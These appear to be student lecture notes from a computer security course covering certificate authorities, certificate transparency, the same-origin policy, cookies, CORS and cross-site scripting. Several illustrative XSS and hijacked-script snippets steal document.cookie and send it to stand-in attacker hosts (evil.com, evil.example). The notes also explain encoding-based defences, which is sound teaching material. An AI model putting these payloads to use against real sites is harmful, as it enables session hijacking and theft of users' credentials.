Csep-564-Lec-6

Corporate CAs

Why would IT want all company machines to have an additional root cert installed, owned and controlled by IT?

  • Allow IT to see (and inspect) all HTTPS traffic, which is useful for enforcing security/privacy policies.

CA Challenges

  • Hash collisions

  • Weak security may allow attackers to issue rogue certs

  • Users don't notice when attacks happen (they may just proceed to http)

  • How do you revoke certs?

    • If you revoke one, you revoke everything downstream that depends on it!
  • DigiNotar, a Dutch Certificate Authority, got hacked.

    • All servers were unpatched and publicly accessible
    • All cert servers had the admin password Pr0d@dm1n
    • No antivirus software
  • In 2013, a rogue *.google.com cert originated from a Turkish CA and was trusted by every browser in the world.

  • DarkMatter attempted to get CA status, but never achieved it; weird stuff going on.

  • Symantec was a major company in the space and participated in standards for a while, but had very public mismanagement for a few years and was eventually distrusted in 2018.

Certificate Transparency

  • Problem: browsers will think nothing is wrong with a rogue cert until it is revoked.
  • Goal: make it impossible for a CA to issue a bad cert for a domain without the owner of that domain knowing.
  • Approach: auditable certificate logs
    • Certs get published in public logs
    • Logs get checked for unexpected certs

Web Security

We're going to focus mostly on defending against "web" attacks, not network attacks (pretty much solved by TLS) or client-side malware.

  • There are three actors:
    • User/browser
    • Website A.com
    • Website B.com

Browser features:

  • Even if you visit an evil website, your browser should let you visit it safely!
  • If you visit an evil site and a good site, your browser should isolate them so that one can't infect/attack the other.
  • Safe delegation: a website should be able to safely embed another one that might have been compromised.

Explicit goals of the browser security model:

  1. Sandbox: Protect local system from web attacker
  2. Same Origin Policy: Protect/isolate web content from other web content
    Notice: these are really similar to the goals of an OS with respect to processes.

To achieve this,

  • JavaScript has
    • no direct file access (see the sketch after this list)
    • limited access to OS, network, browser data
  • tabs and iframes run in their own processes
    • and so get isolation guarantees by default via the OS
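
A minimal sketch of that first restriction, using only standard web platform APIs: page JavaScript can't open arbitrary local files on its own; it only ever sees files the user explicitly hands it.

```html
<!-- Page script has no direct file access: the only way to read a local file
     is through a file the user deliberately picks. -->
<input type="file" id="picker">
<script>
  document.getElementById("picker").addEventListener("change", (e) => {
    const file = e.target.files[0];      // only the user-chosen file is visible
    file.text().then(text => console.log(text.slice(0, 100)));
  });
</script>
```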

Same Origin Policy

where website origin = (scheme, domain, port) e.g. (https, thesurf.in, 443)

  • E.g. http://www.example.com/dir/page.html
    • can req things from http://www.example.com/dir/page2.html
    • cannot req things from http://www.example.com:81/dir/page2.html
    • cannot req things from http://en.example.com/dir/page2.html
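
A minimal sketch of the same checks from JavaScript, using the URLs above (the cross-origin read is refused unless the other server opts in via CORS, covered below):

```js
// Running in a page served from http://www.example.com/dir/page.html

// Same scheme, domain, and port: the response is readable.
fetch("http://www.example.com/dir/page2.html")
  .then(r => r.text())
  .then(text => console.log("same-origin OK, got", text.length, "bytes"));

// Different domain (en.example.com): the browser refuses to hand the
// response to the page unless the server sends permissive CORS headers.
fetch("http://en.example.com/dir/page2.html")
  .then(r => r.text())
  .catch(err => console.log("blocked by the same-origin policy:", err));
```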

Browser Cookies

  • HTTP is a stateless protocol
  • Browser cookies are used to introduce state
    • websites store a small amount of info in the browser
      • using the Set-Cookie header, as key-value pairs
    • used for authentication, personalization, tracking
    • cookies are often secrets

Sites can set cookies scoped to a suffix of their domain, so the cookie is sent to all sites under that suffix.

  • i.e. login.example.com can set for *.example.com
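
A minimal sketch of that (the cookie name and value are made up):

```js
// Script on https://login.example.com scoping a cookie to the whole domain,
// so the browser will send it to *.example.com:
document.cookie = "session=abc123; Domain=example.com; Path=/; Secure";

// Server-side equivalent, sent as an HTTP response header:
//   Set-Cookie: session=abc123; Domain=example.com; Path=/; Secure; HttpOnly
// (HttpOnly can only be set via the header, not from JavaScript.)
```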

Same Origin Policy for Scripts

When you

<script src="http://otherdomain.com/library.js"></script>

that script runs in the context of the embedding website! So the code from otherdomain.com can access HTML elements, cookies, etc. of the embedding page. So you better hope that script doesn't get hijacked.
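
A minimal sketch of what a hijacked library.js could do once it's running in the embedding page's origin (the collection URL is made up):

```js
// This ships to every page that embeds library.js and runs as that page:
document.title = "owned";                  // touch the host page's DOM
const secrets = document.cookie;           // read the host page's cookies
fetch("https://evil.example/collect", {    // ...and quietly send them off-site
  method: "POST",
  mode: "no-cors",                         // fire-and-forget exfiltration
  body: secrets,
});
```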

Cross Origin communication

Sometimes you need it!

  • For cross-origin network requests, you can allow a list of trusted domains.
    • But plz don't do this: Access-Control-Allow-Origin: * which effectively turns off SOP protection.
  • For cross-origin client side communication,
    • HTML5 postMessage between frames
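
A minimal sketch of both mechanisms, reusing A.com and B.com from above:

```js
// Cross-origin network requests: the server opts in per origin with a
// response header such as
//   Access-Control-Allow-Origin: https://a.com
// (not "*", which throws away the protection as noted above).

// Cross-origin client-side communication with postMessage:
// in the embedding page at https://a.com, talking to an iframe from https://b.com
const frame = document.getElementById("b-frame");
frame.contentWindow.postMessage({ hello: "from a.com" }, "https://b.com");

// inside the frame served from https://b.com
window.addEventListener("message", (event) => {
  if (event.origin !== "https://a.com") return;  // always verify the sender's origin
  console.log("received:", event.data);
});
```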

Browser Plugins

  • E.g.: Flash, Java, PDF readers
  • Goal: enable functionality that requires transcending the browser sandbox
  • Problem: increases attack surface

Good news though: sandboxing is improving and the need for plugins is decreasing.

Browser Extensions

  • Not subject to same-origin policy
  • Users grant "fine-grained" permissions per extension
  • Upgrades incoming:
    • Manifest v3 spec
      • Upends how extensions get access to pages
      • Makes ad blockers way harder to implement smh

Web apps

Web apps are frikken complicated. There are a lot of moving pieces, and so a lot of areas for failure. Some of the most common vulns:

  • broken access control
  • cryptographic failures
  • injection
  • security misconfiguration

Cross-site scripting (XSS)

Let's assume this environment:

  • Server written in PHP
    • Form/query variables get put into e.g. $_POST, $_GET arrays.
  • evil.com has an iframe containing naive.com, which outputs $_GET['name'] as a greeting.
  • evil.com sets the iframe src to
    • naive.com/hello?name=<script>window.open('http://evil.com/steal?c=' + document.cookie)</script>
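
Roughly, the attack page and the reflected response look like this (the /steal endpoint is illustrative):

```html
<!-- evil.com's page embeds naive.com with a crafted query string
     (the '+' is percent-encoded as %2B so the server doesn't decode it as a space) -->
<iframe src="http://naive.com/hello?name=<script>window.open('http://evil.com/steal?c='%2Bdocument.cookie)</script>"></iframe>

<!-- naive.com echoes $_GET['name'] into its greeting, so the victim's browser
     receives roughly this and runs the script in naive.com's origin: -->
<h1>Hello, <script>window.open('http://evil.com/steal?c=' + document.cookie)</script>!</h1>
```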

Basic pattern for Reflected XSS

  1. User visits malicious site
  2. User receives malicious page
  3. User sends request to server victim (because malicious page says to)
  4. Server victim echoes user input back to the user.

Basic pattern for Stored XSS

  1. Attack server somehow injects a malicious script into the server victim
  2. User receives the malicious script from the victim server
  3. User inadvertently sends data to the attack server, at the behest of the malicious script
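
A minimal sketch of a stored payload: the attacker submits something like this in, say, a comment or profile field on the victim server, and every user who later views that page runs it (the collect URL is made up):

```html
<script>
  new Image().src = "https://evil.example/collect?c=" + encodeURIComponent(document.cookie);
</script>
```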

In all cases, there are three actors

  1. Adversary
  2. Server victim
  3. User victim

Preventing XSS

  • Any user input / client-side data must be preprocessed before it is used inside HTML.
  • Remove / encode HTML special chars (e.g. & -> &amp;, < -> &lt;); see the encoding sketch after this list.
  • E.g. MySpace worm!
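
A minimal sketch of that encoding in JavaScript (the helper name is ours, not from the lecture):

```js
// Encode the characters that are special in HTML so untrusted input renders
// as text instead of markup. Order matters: escape & first.
function encodeHtml(s) {
  return s.replace(/&/g, "&amp;")
          .replace(/</g, "&lt;")
          .replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;")
          .replace(/'/g, "&#x27;");
}

// encodeHtml("<script>alert(1)</script>")
//   => "&lt;script&gt;alert(1)&lt;/script&gt;"
```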

For Lab 2, there are broken ad hoc XSS filters that we need to get past!